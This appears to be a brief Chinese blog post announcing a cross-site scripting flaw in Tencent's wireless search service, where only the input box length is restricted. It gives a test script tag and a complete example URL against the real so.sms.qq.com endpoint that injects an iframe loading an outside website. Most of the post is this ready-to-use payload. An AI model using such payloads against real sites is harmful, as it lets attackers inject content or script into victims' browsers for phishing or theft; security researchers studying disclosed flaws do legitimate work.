From 樱木花盗's BLOG

腾讯无线搜索跨站漏洞。。。只限制了输入框内的长度

当我拿 <script>alert()</script> 试验的时候正好少了个 > 呵呵，没关系，直接在地址栏里改提交的内容就可以了。。。

Example:

http://so.sms.qq.com/MqqSearch/WebSearchServlet?searchscope=all&searchpg=1&searchpgsize=10&searchch=0&from=&searchinput=<Iframe%20src="http://www.03389.com"%20width=800%20height=600></iframe>